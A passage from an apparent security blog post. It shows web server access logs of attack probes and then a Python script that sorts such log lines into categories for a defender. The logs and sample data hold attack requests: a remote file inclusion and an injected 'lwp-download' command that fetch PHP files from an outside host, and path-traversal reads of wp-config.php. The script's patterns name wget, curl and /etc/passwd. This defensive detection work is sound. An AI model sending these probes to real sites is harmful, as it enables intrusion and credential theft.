162.158.161.83 - - [18/Jan/2020:18:18:12 +0000] "GET /assets/plugin/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.242 - - [18/Jan/2020:18:18:12 +0000] "GET /vendor/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.206 - - [18/Jan/2020:18:18:12 +0000] "GET /kcfinder-2.51/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.48 - - [18/Jan/2020:18:18:12 +0000] "GET /scripts/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.114 - - [18/Jan/2020:18:18:12 +0000] "GET /core/scripts/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.163.105 - - [18/Jan/2020:18:18:12 +0000] "GET /scripts/kcfinder-2.51/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.14 - - [18/Jan/2020:18:18:12 +0000] "GET /admin/scripts/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.131 - - [18/Jan/2020:18:18:12 +0000] "GET /assets/admin/js/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.20 - - [18/Jan/2020:18:18:12 +0000] "GET /admin/js/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.182 - - [18/Jan/2020:18:18:12 +0000] "GET /js/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.242 - - [18/Jan/2020:18:24:12 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.69.132.110 - - [18/Jan/2020:18:24:13 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
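Reading the four examples by eye works for a small site, but the same judgement can be written down as rules and run over the whole log. The script below is an added example for this post, not code from the post or from any tool it mentions; it parses the combined log format that nginx and Apache write (the lines above are in it), decodes the URL first so that `%5B%5D`, `%20` and `%7C` cannot hide a pattern, and then applies one detector per example: a parameter whose value is a URL or a `;wget`/`;lwp-download` tail for Example 1, `../` traversal or a reference to `wp-config.php` for Example 2, a burst of `HEAD /` from one source for Example 3, and many distinct 404 paths (plus `/?author=N`, which is WordPress user enumeration) for Example 4. Two points the post's own lines raise and a practitioner should act on: the `revslider_show_image` request in Example 2 that got a 200 with 732 bytes is the one line that needs to be checked by hand, so the script puts any probe answered with a non-4xx status under `needs-review`; and status 444 is nginx's code for closing the connection without a response, so the HEAD probes in Example 3 were already being refused. One caveat on grouping by address: all the source addresses in these excerpts sit in ranges Cloudflare publishes as its own edge (162.158.0.0/15, 172.64.0.0/13), so the first field is the proxy, not the scanner; to key on the real client, have nginx restore it with the `real_ip` module (`set_real_ip_from` / `real_ip_header CF-Connecting-IP`) before running anything like this. The function names, label strings, thresholds and window size are my own choices; the sample lines are a small selection copied from the post's excerpts.

```python
"""Triage access-log lines for the patterns the post shows: RFI/command probes,
LFI traversal, HEAD-only connectivity probes and directory guessing."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Combined log format as nginx/Apache write it:
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_URL_RE = re.compile(r"=\s*(?:https?|ftp)://", re.I)          # RFI: a parameter value that is a URL
SHELL_CMD_RE = re.compile(r";\s*(?:wget|curl|lwp-download)\b", re.I)  # phpThumb-style command in a filter
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")                           # LFI: path traversal
SENSITIVE_RE = re.compile(r"wp-config\.php|/etc/passwd", re.I)       # LFI target files
AUTHOR_ENUM_RE = re.compile(r"^/\?author=\d+$")                      # WordPress user enumeration

def parse_line(line):
    """Parse one combined-format line; return None for anything that does not fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = unquote(rec["path"])  # decode %5B%5D, %20, %7C ... before matching
    return rec

def classify(rec):
    """Labels that apply to a single request, judged on its decoded path alone."""
    labels, path = set(), rec["path"]
    if REMOTE_URL_RE.search(path) or SHELL_CMD_RE.search(path):
        labels.add("rfi")
    if TRAVERSAL_RE.search(path) or SENSITIVE_RE.search(path):
        labels.add("lfi")
    if AUTHOR_ENUM_RE.match(path):
        labels.add("user-enum")
    return labels

def head_probe_bursts(records, window_s=60, threshold=3):
    """Sources that send `threshold` or more HEAD / requests inside any `window_s` window."""
    times = defaultdict(list)
    for r in records:
        if r["method"] == "HEAD" and r["path"] == "/":
            times[r["ip"]].append(r["time"])
    hits = {}
    for ip, ts in times.items():
        ts.sort()
        best = start = 0
        for end in range(len(ts)):  # sliding window over the sorted timestamps
            while (ts[end] - ts[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits

def dir_bruteforce(records, threshold=5):
    """Sources that accumulate `threshold` or more distinct 404 paths."""
    misses = defaultdict(set)
    for r in records:
        if r["status"] == 404:
            misses[r["ip"]].add(r["path"])
    return {ip: len(p) for ip, p in misses.items() if len(p) >= threshold}

def triage(lines):
    """Run every detector over the lines and return a report keyed by label."""
    records = [r for r in map(parse_line, lines) if r]
    report = defaultdict(list)
    for r in records:
        for label in classify(r):
            report[label].append((r["ip"], r["status"], r["path"]))
            # A probe that was *not* refused is the line to investigate first.
            if label in ("rfi", "lfi") and r["status"] < 400:
                report["needs-review"].append((r["ip"], r["status"], r["path"]))
    report["head-burst"] = head_probe_bursts(records)
    report["dir-bruteforce"] = dir_bruteforce(records)
    return dict(report)

# Sample lines copied from the post's excerpts (a small selection, not a full capture).
SAMPLE = """\
172.69.132.212 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/timthumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.163.111 - - [21/Jan/2020:07:27:13 +0000] "GET /wp-content/themes/Newspaper//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.6 - - [16/Jan/2020:08:27:48 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 732 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.235 - - [17/Jan/2020:15:21:38 +0000] "GET /wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.6 - - [14/Jan/2020:06:29:41 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:29:44 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:30:11 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [20/Jan/2020:23:33:29 +0000] "GET /test/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:34:56 +0000] "GET /cms/ HTTP/1.1" 404 25821 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:35:07 +0000] "GET /dev/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:35:18 +0000] "GET /portal/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [21/Jan/2020:00:03:43 +0000] "GET /?author=4 HTTP/1.1" 404 25837 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""

if __name__ == "__main__":
    for label, hits in triage(SAMPLE.splitlines()).items():
        print(f"{label}: {hits}")
```

To run it on a live server, replace `SAMPLE.splitlines()` with the lines of the access log (`triage(open("/var/log/nginx/access.log").read().splitlines())`), and tune the thresholds to the site's normal traffic: five distinct 404s from one client in a day is noise on a busy site and a scan on a small blog.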
After reading these logs, you can get a good sense of direction for building a secure environment.